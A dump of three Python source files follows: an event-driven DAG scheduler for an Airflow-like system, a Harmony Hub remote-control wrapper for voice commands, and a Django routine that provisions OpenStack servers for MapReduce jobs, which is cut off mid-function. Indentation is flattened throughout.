class EventBasedScheduler(LoggingMixin):
def __init__(self, id,
mailbox: Mailbox,
task_event_manager: DagRunEventManager,
executor: BaseExecutor,
notification_client: NotificationClient,
notification_server_uri: str,
context=None,
periodic_manager: PeriodicManager = None):
super().__init__(context)
self.id = id
self.mailbox = mailbox
self.task_event_manager: DagRunEventManager = task_event_manager
self.executor = executor
self.notification_client = notification_client
self.dagbag = DagBag(read_dags_from_db=True)
self._timer_handler = None
self.timers = sched.scheduler()
self.periodic_manager = periodic_manager
self.notification_server_uri = notification_server_uri
def sync(self):
def call_regular_interval(
delay: float,
action: Callable,
arguments=(),
kwargs={},
): # pylint: disable=dangerous-default-value
def repeat(*args, **kwargs):
action(*args, **kwargs)
# This is not perfect. If we want a timer every 60s, but action
# takes 10s to run, this will run it every 70s.
# Good enough for now
self._timer_handler = self.timers.enter(delay, 1, repeat, args, kwargs)
self._timer_handler = self.timers.enter(delay, 1, repeat, arguments, kwargs)
call_regular_interval(
delay=conf.getfloat('scheduler', 'scheduler_heartbeat_sec', fallback='5.0'),
action=self.executor.sync
)
self.timers.run()
def stop_timer(self):
if self.timers and self._timer_handler:
self.timers.cancel(self._timer_handler)
def submit_sync_thread(self):
threading.Thread(target=self.sync).start()
def schedule(self) -> bool:
identified_message = self.mailbox.get_identified_message()
if not identified_message:
return True
origin_event = identified_message.deserialize()
self.log.debug("Event: {}".format(origin_event))
if SchedulerInnerEventUtil.is_inner_event(origin_event):
event = SchedulerInnerEventUtil.to_inner_event(origin_event)
else:
event = origin_event
with create_session() as session:
if isinstance(event, BaseEvent):
dagruns = self._find_dagruns_by_event(event, session)
for dagrun in dagruns:
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, event)
elif isinstance(event, RequestEvent):
self._process_request_event(event)
elif isinstance(event, TaskSchedulingEvent):
self._schedule_task(event)
elif isinstance(event, TaskStateChangedEvent):
dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
if dagrun is not None:
self._handle_task_status_changed(dagrun, event, session)
dag_run_id = DagRunId(dagrun.dag_id, dagrun.run_id)
self.task_event_manager.handle_event(dag_run_id, origin_event)
tasks = self._find_downstream_tasks(event.task_id, dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
if dagrun.state in State.finished:
self.mailbox.send_message(DagRunFinishedEvent(dagrun.dag_id, dagrun.execution_date).to_event())
else:
self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(event.dag_id,
event.execution_date))
elif isinstance(event, DagRunCreatedEvent):
dagrun = self._find_dagrun(event.dag_id, event.execution_date, session)
if dagrun is not None:
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
else:
self.log.warning("dagrun is None for dag_id:{} execution_date: {}".format(
event.dag_id, event.execution_date))
elif isinstance(event, DagExecutableEvent):
if DagModel.dag_needing_dagruns(session, event.dag_id):
dagrun = self._create_dag_run(event.dag_id, session=session)
tasks = self._find_scheduled_tasks(dagrun, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
elif isinstance(event, EventHandleEvent):
dag_runs = DagRun.find(dag_id=event.dag_id, run_id=event.dag_run_id)
assert len(dag_runs) == 1
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, event.action)
elif isinstance(event, StopDagEvent):
self._stop_dag(event.dag_id, session)
elif isinstance(event, DagRunFinishedEvent):
self._remove_periodic_events(event.dag_id, event.execution_date)
elif isinstance(event, PeriodicEvent):
dag_runs = DagRun.find(dag_id=event.dag_id, execution_date=event.execution_date)
assert len(dag_runs) == 1
ti = dag_runs[0].get_task_instance(event.task_id)
self._send_scheduling_task_event(ti, SchedulingAction.RESTART)
elif isinstance(event, StopSchedulerEvent):
self.log.info("{} {}".format(self.id, event.job_id))
if self.id == event.job_id or 0 == event.job_id:
self.log.info("break the scheduler event loop.")
identified_message.remove_handled_message()
session.expunge_all()
return False
elif isinstance(event, ParseDagRequestEvent) or isinstance(event, ParseDagResponseEvent):
pass
elif isinstance(event, ResponseEvent):
pass
else:
self.log.error("can not handler the event {}".format(event))
identified_message.remove_handled_message()
session.expunge_all()
return True
def _handle_task_status_changed(self, dagrun: DagRun, event: TaskStateChangedEvent, session):
ti = dagrun.get_task_instance(task_id=event.task_id)
if event.try_number == ti.try_number:
if State.UP_FOR_RETRY == event.state:
dag = self.dagbag.get_dag(dagrun.dag_id, session=session)
ti.task = dag.get_task(ti.task_id)
next_retry_datetime = ti.next_retry_datetime()
self.mailbox.send_message(message=TaskSchedulingEvent(dag_id=event.dag_id,
task_id=event.task_id,
execution_date=event.execution_date,
try_number=event.try_number,
action=SchedulingAction.START).to_event(),
queue_time=next_retry_datetime)
ti.update_latest_task_execution(session=session)
def stop(self) -> None:
self.mailbox.send_message(StopSchedulerEvent(self.id).to_event())
self.log.info("Send stop event to the scheduler.")
def recover(self, last_scheduling_id):
lost_dag_codes = DagCode.recover_lost_dag_code()
self.log.info("Found %s dags not exists in DAG folder, recovered from DB. Dags' path: %s",
len(lost_dag_codes), lost_dag_codes)
self.log.info("Waiting for executor recovery...")
self.executor.recover_state()
unprocessed_messages = self.get_unprocessed_message(last_scheduling_id)
self.log.info("Recovering %s messages of last scheduler job with id: %s",
len(unprocessed_messages), last_scheduling_id)
for msg in unprocessed_messages:
self.mailbox.send_message(msg.deserialize(), msg.queue_time)
@staticmethod
def get_unprocessed_message(last_scheduling_id: int) -> List[IdentifiedMessage]:
with create_session() as session:
results: List[MSG] = session.query(MSG).filter(
MSG.scheduling_job_id == last_scheduling_id,
MSG.state == MessageState.QUEUED
).order_by(asc(MSG.id)).all()
unprocessed: List[IdentifiedMessage] = []
for msg in results:
unprocessed.append(IdentifiedMessage(msg.data, msg.id, msg.queue_time))
return unprocessed
def _find_dagrun(self, dag_id, execution_date, session) -> DagRun:
dagrun = session.query(DagRun).filter(
DagRun.dag_id == dag_id,
DagRun.execution_date == execution_date
).first()
return dagrun
def _register_periodic_events(self, execution_date, dag, session=None):
self.periodic_manager.store.set_session(session)
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('register periodic task {} {} {}'.format(dag.dag_id, execution_date, task.task_id))
self.periodic_manager.add_task(dag_id=dag.dag_id,
execution_date=execution_date,
task_id=task.task_id,
periodic_config=task.executor_config['periodic_config'])
self.periodic_manager.store.unset_session()
@provide_session
def _remove_periodic_events(self, dag_id, execution_date, session=None):
dagruns = DagRun.find(dag_id=dag_id, execution_date=execution_date)
dag = self.dagbag.get_dag(dag_id=dagruns[0].dag_id, session=session)
for task in dag.tasks:
if task.executor_config is not None and 'periodic_config' in task.executor_config:
self.log.debug('remove periodic task {} {} {}'.format(dag_id, execution_date, task.task_id))
self.periodic_manager.remove_task(dag_id, execution_date, task.task_id)
def _create_dag_run(self, dag_id, session, run_type=DagRunType.SCHEDULED, context=None) -> DagRun:
with prohibit_commit(session) as guard:
if settings.USE_JOB_SCHEDULE:
"""
Unconditionally create a DAG run for the given DAG, and update the dag_model's fields to control
if/when the next DAGRun should be created
"""
try:
dag = self.dagbag.get_dag(dag_id, session=session)
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
if dag_model is None:
return None
next_dagrun = dag_model.next_dagrun
dag_hash = self.dagbag.dags_hash.get(dag.dag_id)
external_trigger = False
# register periodic task
if run_type == DagRunType.MANUAL:
next_dagrun = timezone.utcnow()
external_trigger = True
# Explicitly check if the DagRun already exists. This is an edge case
# where a Dag Run is created but `DagModel.next_dagrun` and `DagModel.next_dagrun_create_after`
# are not updated.
active_dagrun = session.query(DagRun)\
.filter(DagRun.dag_id == dag_model.dag_id,
DagRun.execution_date == dag_model.next_dagrun).first()
if active_dagrun is not None:
self.log.info("Dagrun already created, %s", active_dagrun)
return active_dagrun
dag_run = dag.create_dagrun(
run_type=run_type,
execution_date=next_dagrun,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=external_trigger,
session=session,
dag_hash=dag_hash,
creating_job_id=self.id,
context=context
)
if run_type == DagRunType.SCHEDULED:
self._update_dag_next_dagrun(dag_id, session)
self._register_periodic_events(dag_run.execution_date, dag, session)
# commit the session - Release the write lock on DagModel table.
guard.commit()
# END: create dagrun
return dag_run
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_id)
return None
except Exception:
self.log.exception("Error occurred when create dag_run of dag: %s", dag_id)
return None
def _update_dag_next_dagrun(self, dag_id, session):
"""
Bulk update the next_dagrun and next_dagrun_create_after for all the dags.
We batch the select queries to get info about all the dags at once
"""
active_runs_of_dag = session \
.query(func.count('*')).filter(
DagRun.dag_id == dag_id,
DagRun.state == State.RUNNING,
DagRun.external_trigger.is_(False),
).scalar()
dag_model = session \
.query(DagModel).filter(DagModel.dag_id == dag_id).first()
dag = self.dagbag.get_dag(dag_id, session=session)
if dag.max_active_runs and active_runs_of_dag >= dag.max_active_runs:
self.log.info(
"DAG %s is at (or above) max_active_runs (%d of %d), not creating any more runs",
dag.dag_id,
active_runs_of_dag,
dag.max_active_runs,
)
dag_model.next_dagrun_create_after = None
else:
dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
def _schedule_task(self, scheduling_event: TaskSchedulingEvent):
task_key = TaskInstanceKey(
scheduling_event.dag_id,
scheduling_event.task_id,
scheduling_event.execution_date,
scheduling_event.try_number
)
self.executor.schedule_task(task_key, scheduling_event.action)
def _find_dagruns_by_event(self, event, session) -> Optional[List[DagRun]]:
affect_dag_runs = []
event_key = EventKey(event.key, event.event_type, event.namespace, event.sender)
dag_runs = session \
.query(DagRun).filter(DagRun.state == State.RUNNING).all()
self.log.debug('dag_runs {}'.format(len(dag_runs)))
if dag_runs is None or len(dag_runs) == 0:
return affect_dag_runs
dags = session.query(SerializedDagModel).filter(
SerializedDagModel.dag_id.in_(dag_run.dag_id for dag_run in dag_runs)
).all()
self.log.debug('dags {}'.format(len(dags)))
affect_dags = {}
for dag in dags:
self.log.debug('dag config {}'.format(dag.event_relationships))
self.log.debug('event key {} {} {}'.format(event.key, event.event_type, event.namespace))
dep: DagEventDependencies = DagEventDependencies.from_json(dag.event_relationships)
if dep.is_affect(event_key):
context_extractor: ContextExtractor = dag.context_extractor
try:
event_context: EventContext = context_extractor.extract_context(event)
except Exception as e:
self.log.error(
"Failed to call context extractor, dag {} skips event {}".format(dag.dag_id, event),
exc_info=e)
continue
if event_context is not None:
affect_dags[dag.dag_id] = event_context
if len(affect_dags) == 0:
return affect_dag_runs
for dag_run in dag_runs:
if dag_run.dag_id in affect_dags:
event_context: EventContext = affect_dags[dag_run.dag_id]
if event_context.is_broadcast() or dag_run.context in event_context.get_contexts():
affect_dag_runs.append(dag_run)
return affect_dag_runs
def _find_scheduled_tasks(
self,
dag_run: DagRun,
session: Session,
check_execution_date=False
) -> Optional[List[TI]]:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to ask this for all dag runs in the batch, to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:return: scheduled tasks
"""
if not dag_run or dag_run.get_state() in State.finished:
return
try:
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id)
return None
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return None
currently_active_runs = session.query(
TI.execution_date,
).filter(
TI.dag_id == dag_run.dag_id,
TI.state.notin_(list(State.finished)),
).distinct().all()
if check_execution_date and dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.warning("Execution date is in future: %s", dag_run.execution_date)
return None
if dag.max_active_runs and not dag.is_long_running_dag():
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.warning(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
dag_run.schedule_tis(schedulable_tis, session)
session.commit()
query = (session.query(TI)
.outerjoin(TI.dag_run)
.filter(DR.run_id == dag_run.run_id)
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model')))
scheduled_tis: List[TI] = with_row_locks(
query,
of=TI,
**skip_locked(session=session),
).all()
return scheduled_tis
def _find_downstream_tasks(self, task_id, dag_run, session) -> Optional[List[TI]]:
tasks = self._find_scheduled_tasks(dag_run, session)
if not tasks or len(tasks) == 0:
return None
dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
downstream_task_ids = dag.task_dict.get(task_id).downstream_task_ids
res = []
for task in tasks:
if task.task_id in downstream_task_ids:
res.append(task)
return res
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_scheduling_task_event(self, ti: Optional[TI], action: SchedulingAction):
if ti is None or action == SchedulingAction.NONE:
return
with create_session() as session:
ti.state = State.QUEUED
session.commit()
task_scheduling_event = TaskSchedulingEvent(
ti.task_id,
ti.dag_id,
ti.execution_date,
ti.try_number,
action
)
self.mailbox.send_message(task_scheduling_event.to_event())
def _send_scheduling_task_events(self, tis: Optional[List[TI]], action: SchedulingAction):
if tis is None:
return
for ti in tis:
self._send_scheduling_task_event(ti, action)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@staticmethod
def _reset_unfinished_task_state(dag_run):
with create_session() as session:
to_be_reset = [s for s in State.unfinished if s not in [State.RUNNING, State.QUEUED]]
tis = dag_run.get_task_instances(to_be_reset, session)
for ti in tis:
ti.state = State.NONE
session.commit()
@provide_session
def restore_unfinished_dag_run(self, session):
dag_runs = DagRun.next_dagruns_to_examine(session, max_number=sys.maxsize).all()
if not dag_runs or len(dag_runs) == 0:
return
for dag_run in dag_runs:
self._reset_unfinished_task_state(dag_run)
tasks = self._find_scheduled_tasks(dag_run, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def _process_request_event(self, event: RequestEvent, session: Session = None):
try:
message = BaseUserDefineMessage()
message.from_json(event.body)
if message.message_type == UserDefineMessageType.RUN_DAG:
# todo make sure dag file is parsed.
dagrun = self._create_dag_run(message.dag_id, session=session, run_type=DagRunType.MANUAL,
context=message.context)
if not dagrun:
self.log.error("Failed to create dag_run.")
# TODO Need to add ret_code and errro_msg in ExecutionContext in case of exception
self.notification_client.send_event(ResponseEvent(event.request_id, None).to_event())
return
tasks = self._find_scheduled_tasks(dagrun, session, False)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
elif message.message_type == UserDefineMessageType.STOP_DAG_RUN:
dag_run = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
self._stop_dag_run(dag_run)
self.notification_client.send_event(ResponseEvent(event.request_id, dag_run.run_id).to_event())
elif message.message_type == UserDefineMessageType.EXECUTE_TASK:
dagrun = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
ti: TI = dagrun.get_task_instance(task_id=message.task_id)
self.mailbox.send_message(TaskSchedulingEvent(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=ti.execution_date,
try_number=ti.try_number,
action=SchedulingAction(message.action)
).to_event())
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
except Exception:
self.log.exception("Error occurred when processing request event.")
def _stop_dag(self, dag_id, session: Session):
"""
Stop the dag. Pause the dag and cancel all running dag_runs and task_instances.
"""
DagModel.get_dagmodel(dag_id, session)\
.set_is_paused(is_paused=True, including_subdags=True, session=session)
active_runs = DagRun.find(dag_id=dag_id, state=State.RUNNING)
for dag_run in active_runs:
self._stop_dag_run(dag_run)
def _stop_dag_run(self, dag_run: DagRun):
dag_run.stop_dag_run()
for ti in dag_run.get_task_instances():
if ti.state in State.unfinished:
self.executor.schedule_task(ti.key, SchedulingAction.STOP)
self.mailbox.send_message(DagRunFinishedEvent(dag_id=dag_run.dag_id,
execution_date=dag_run.execution_date).to_event())
class SchedulerEventWatcher(EventWatcher):
def __init__(self, mailbox):
self.mailbox = mailbox
def process(self, events: List[BaseEvent]):
for e in events:
self.mailbox.send_message(e)
class EventBasedSchedulerJob(BaseJob):
"""
1. todo self heartbeat
"""
__mapper_args__ = {'polymorphic_identity': 'EventBasedSchedulerJob'}
def __init__(self, dag_directory,
notification_server_uri=None,
event_start_time=None,
max_runs=-1,
refresh_dag_dir_interval=conf.getint('scheduler', 'refresh_dag_dir_interval', fallback=1),
*args, **kwargs):
super().__init__(*args, **kwargs)
if notification_server_uri is None:
notification_server_uri = conf.get('scheduler', 'notification_server_uri', fallback='127.0.0.1:50052')
self.log.info("Starting event based scheduler with notification server uri: {}".format(notification_server_uri))
self.mailbox: Mailbox = Mailbox()
self.dag_trigger: DagTrigger = DagTrigger(
dag_directory=dag_directory,
max_runs=max_runs,
dag_ids=None,
pickle_dags=False,
mailbox=self.mailbox,
refresh_dag_dir_interval=refresh_dag_dir_interval,
notification_server_uri=notification_server_uri
)
self.task_event_manager = DagRunEventManager(self.mailbox)
self.executor.set_mailbox(self.mailbox)
self.executor.set_notification_server_uri(notification_server_uri)
self.notification_client: NotificationClient = NotificationClient(server_uri=notification_server_uri,
default_namespace=SCHEDULER_NAMESPACE)
self.periodic_manager = PeriodicManager(self.mailbox)
self.scheduler: EventBasedScheduler = EventBasedScheduler(
self.id,
self.mailbox,
self.task_event_manager,
self.executor,
self.notification_client,
notification_server_uri,
None,
self.periodic_manager
)
self.last_scheduling_id = self._last_scheduler_job_id()
self.need_recover_state = False
self.last_event_version = None
if event_start_time is None:
if self.last_scheduling_id is None:
self.start_time = int(time.time() * 1000)
else:
# need recover the state of the scheduler
self.start_time, self.last_event_version = self._get_progress(self.last_scheduling_id)
self.need_recover_state = True
else:
self.start_time = event_start_time
self.log.info('Progress {} {}'.format(self.start_time, self.last_event_version))
@staticmethod
def _last_scheduler_job_id():
last_run = EventBasedSchedulerJob.most_recent_job()
if not last_run:
return None
else:
return last_run.id
@staticmethod
def _get_progress(scheduling_job_id):
progress = get_event_progress(scheduling_job_id)
if progress is None:
return int(time.time() * 1000), None
else:
return progress.last_event_time, progress.last_event_version
def _execute(self):
# faulthandler.enable()
self.log.info("Starting the scheduler Job")
# DAGs can be pickled for easier remote execution by some executors
# pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
try:
self.mailbox.set_scheduling_job_id(self.id)
self.mailbox.start()
self.scheduler.id = self.id
self.dag_trigger.start()
self.task_event_manager.start()
self.executor.job_id = self.id
self.periodic_manager.start()
self.register_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
execute_start_time = timezone.utcnow()
self.scheduler.submit_sync_thread()
if self.need_recover_state:
self.scheduler.recover(self.last_scheduling_id)
self._set_event_progress()
self._start_listen_events()
self.executor.start()
self._run_scheduler_loop()
self._stop_listen_events()
self.periodic_manager.shutdown()
self.dag_trigger.end()
self.task_event_manager.end()
self.executor.end()
self.mailbox.stop()
settings.Session.remove() # type: ignore
except Exception as e: # pylint: disable=broad-except
self.log.exception("Exception when executing scheduler, %s", e)
finally:
self.log.info("Exited execute loop")
def _run_scheduler_loop(self) -> None:
self.log.info("Starting the scheduler loop.")
self.scheduler.restore_unfinished_dag_run()
should_continue = True
while should_continue:
try:
should_continue = self.scheduler.schedule()
self.heartbeat(only_if_necessary=True)
except Exception as e:
traceback.print_exc()
self.log.error('Scheduler error [%s]', traceback.format_exc())
time.sleep(1)
self.scheduler.stop_timer()
def _set_event_progress(self):
create_or_update_progress(scheduling_job_id=self.id,
last_event_time=self.start_time,
last_event_version=self.last_event_version)
def _start_listen_events(self):
watcher = SchedulerEventWatcher(self.mailbox)
self.notification_client.start_listen_events(
watcher=watcher,
start_time=self.start_time,
version=self.last_event_version
)
def _stop_listen_events(self):
self.notification_client.stop_listen_events()
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
|
schhaio.py
|
"""Provides SmartCommandsHarmonyHub for smarter interaction with a HarmonyHub"""
import asyncio
from functools import partial
from threading import Thread
from aioharmony.harmonyapi import HarmonyAPI
from aioharmony.const import SendCommandDevice
from hermes_python.ontology.injection import (InjectionRequestMessage, AddFromVanillaInjectionRequest)
class SmartCommandsHarmonyHub:
"""Class for interacting with a Harmony Hub in a smarter way"""
def __init__(self, remote_address):
"""Initialize members
remote_address: The host name or IP address of the Harmony Hub
"""
self.loop = asyncio.new_event_loop()
self.thread = Thread(target=self._asyncio_thread_loop)
self.thread.start()
self.remote_address = remote_address
self.config = None
self.activity_id = -1
self.activity_name = "Power Off"
self.command_map = {}
def _asyncio_thread_loop(self):
asyncio.set_event_loop(self.loop)
self.loop.run_forever()
async def _stop_event_loop(self):
self.loop.stop()
return self.loop.is_running()
def _reset_state_info(self):
"""Resets state-related members to their defaults"""
self.config = None
self.activity_id = -1
self.activity_name = "Power Off"
async def _run_in_loop2(self, co_routine):
# Call _connect, if it returns -1, return -1 from here,
api = await self._connect()
if api == -1:
return -1
# Otherwise, carry on
return_value = await co_routine(api)
await self._close(api)
return return_value
def _run_in_loop(self, co_routine):
future = asyncio.run_coroutine_threadsafe(
self._run_in_loop2(co_routine),
self.loop)
return future.result()
async def _close(self, api):
"""Closes the connectoion to the Harmony Hub"""
await api.close()
self._reset_state_info()
async def _connect(self):
"""Connects to the Harmony Hub"""
api = HarmonyAPI(ip_address=self.remote_address, loop=self.loop)
if await api.connect():
self.config = api.hub_config[0]
(self.activity_id, self.activity_name) = api.current_activity
return api
return False
def _get_channel_separator(self):
return "."
def _get_commands_payload(self, commands):
return AddFromVanillaInjectionRequest({"harmony_hub_command": commands})
def _get_activities_payload(self, activities):
return AddFromVanillaInjectionRequest({"harmony_hub_activities_name": activities})
async def _get_update_payload(self, _):
""" Finds all the commands and returns a payload for injecting
commands """
operations = []
activities = []
commands = []
self.command_map = {}
for activity in self.config["activity"]:
activities.append(activity["label"])
for cgroups in activity["controlGroup"]:
for fncn in cgroups["function"]:
(label_key, voice_command) = self._label_to_key_and_voice_command(fncn["label"], activity["id"])
commands.append(voice_command)
self.command_map[label_key] = {}
# Initialize command to fncn["name"], in case we
# can't find better
self.command_map[label_key]["command"] = fncn["name"]
# Find better...
idx = fncn["action"].find("command")
if idx != -1:
idx += 10
ridx = fncn["action"].find("\"", idx)
if ridx != -1:
self.command_map[label_key]["command"] = fncn["action"][idx:ridx]
# Next, find the device to use
ridx = fncn["action"].rfind("\"")
idx = fncn["action"].find("deviceId")
if idx == -1:
idx = ridx - 8
else:
idx += 11
self.command_map[label_key]["device"] = fncn["action"][idx:ridx]
operations.append(self._get_activities_payload(activities))
operations.append(self._get_commands_payload(list(set(commands))))
return InjectionRequestMessage(operations)
def _label_to_key_and_voice_command(self, label, activity):
""" Return the key for command_map for the given label and activity"""
if label == "0":
label = "zero"
elif label == "1":
label = "one"
elif label == "2":
label = "two"
elif label == "3":
label = "three"
elif label == "4":
label = "four"
elif label == "5":
label = "five"
elif label == "6":
label = "six"
elif label == "7":
label = "seven"
elif label == "8":
label = "eight"
elif label == "9":
label = "nine"
voice_command = label
return (activity + "_" + label.lower().replace(" ", "_"), voice_command)
def _map_command(self, command):
"""Maps from a command label to a command"""
label_key = self._label_to_key_and_voice_command(command, str(self.activity_id))[0]
if label_key in self.command_map.keys():
return self.command_map[label_key]
return None
async def _change_channel(self, which_channel, api):
# Note that we have to call send_to_hub directly, because the
# HarmonyAPI assumes channel must be an int, which doesn't work
# with digital channels
params = {
'timestamp': 0,
'channel': which_channel
}
response = await api._harmony_client.send_to_hub(
command='change_channel',
params=params)
if not response:
return 0
return 1 if response.get('code') == 200 else 0
def change_channel(self, channel_slot):
"""Changes to the specified channel, being sure that if digital
channels are used, that it uses the correct separator style.
"""
which_channel = ""
dot_reached = False
sub_channel = 0
for idx in range(len(channel_slot)):
if channel_slot[idx].isdigit() and not dot_reached:
which_channel += channel_slot[idx]
elif channel_slot[idx] == "." or channel_slot[idx] == ",":
which_channel += self._get_channel_separator()
dot_reached = True
idx += 1
break
if dot_reached:
if len(channel_slot) > idx:
sub_channel = int(channel_slot[idx])
if len(channel_slot) > idx+1 and int(channel_slot[idx+1]) >= 5:
sub_channel += 1
which_channel += str(sub_channel)
return self._run_in_loop(partial(self._change_channel, which_channel))
async def _send_command(self, command, repeat, delay, api):
mapped_command = self._map_command(command)
if mapped_command is None:
return 0
send_commands = []
for _ in range(repeat):
send_commands.append(SendCommandDevice(device=mapped_command["device"], command=mapped_command["command"], delay=delay))
if len(send_commands) == 0:
return 0
await api.send_commands(send_commands)
return 1
def send_command(self, command, repeat, delay=0.1):
"""Sends command to the Harmony Hub repeat times"""
return self._run_in_loop(partial(self._send_command, command, repeat, delay))
async def _list_activities(self, _):
activities = []
for x in self.config["activity"]:
activities.append(x["label"])
return activities
def list_activities(self):
"""Returns a list of activities"""
return self._run_in_loop(partial(self._list_activities))
async def _current_activity(self, _):
return (self.activity_id, self.activity_name)
def current_activity(self):
"""Returns the ID and name of the current activity"""
return self._run_in_loop(partial(self._current_activity))
async def _start_activity(self, activity_name, api):
if activity_name == self.activity_name:
return -2
activity_id = api.get_activity_id(activity_name)
if activity_id is None:
return -3
ret_value = await api.start_activity(activity_id)
if ret_value:
return 1
return 0
def start_activity(self, activity_name):
"""Starts an activity on the Harmony Hub"""
return self._run_in_loop(partial(self._start_activity, activity_name))
def power_off(self):
"""Sets the current activity of the Harmony Hub to -1, AKA "PowerOff"."""
return self.start_activity("PowerOff")
def get_injection_payload(self):
"""Injects the list of activities known to the Harmony Hub"""
payload = self._run_in_loop(partial(self._get_update_payload))
if payload == -1:
return None
return payload
def close(self):
future = asyncio.run_coroutine_threadsafe(
self._stop_event_loop(),
self.loop)
self.thread.join()
return
__all__ = ["SmartCommandsHarmonyHub"]
|
process.py
|
from django.core.files import File
from mapred.fabric import fabfile
from mapred import compute
from mapred.models import Server
from mapred.objects import OSServer
from multiprocessing import Process
import time
import os
#import pdb
class DTimer(object): # dynamic timer ...
pass
def _execute(request, job, form, media_root):
######### virtual machine creation #########
api_token_url = request.session['api_token_url']
api_token = api_token_url['api_token']
compute_url = api_token_url['compute_url']
image_id = compute.get_image_id(api_token, compute_url)
keypair = compute.gen_keypair(api_token, compute_url)
server_count = form.cleaned_data['server_count']
server_name = form.cleaned_data['server_name']
flavor_id = form.cleaned_data['flavor']
timer = DTimer()
timer.deploystart = time.time()
try:
server_id_list = compute.create_servers(api_token, compute_url,
keypair['key_name'], server_count, server_name,
image_id, flavor_id)
while True:
#sleep and retry until an ipv4 had been set
try:
#time.sleep(server_count * 4)
time.sleep(0.1)
os_server_list = OSServer.from_json_list(
compute.get_server_info(api_token, compute_url, server_id_list))
break
except KeyError:
pass
flavor = request.session['flavors_dict'][flavor_id]
for os_server in os_server_list:
server = Server(job=job, openstack_id=os_server.id,
server_name=os_server.name, vcpus=flavor.vcpus,
ram=flavor.ram, disk=flavor.disk)
server.save()
#FABRIC
fabfile.set_key(
abs_file_path='{0}/{1}/job_{2}/'.format(
media_root, request.user.username, job.pk),
file_name=keypair['key_name'] + '.pem',
priv_key=keypair['private_key'])
fabfile.set_hadoop_ram(flavor.ram)
fabfile.set_master_ips(priv_ipv4=os_server_list[0].private_ipv4,
pub_ipv4=os_server_list[0].public_ipv4)
fabfile.set_slaves_ips(
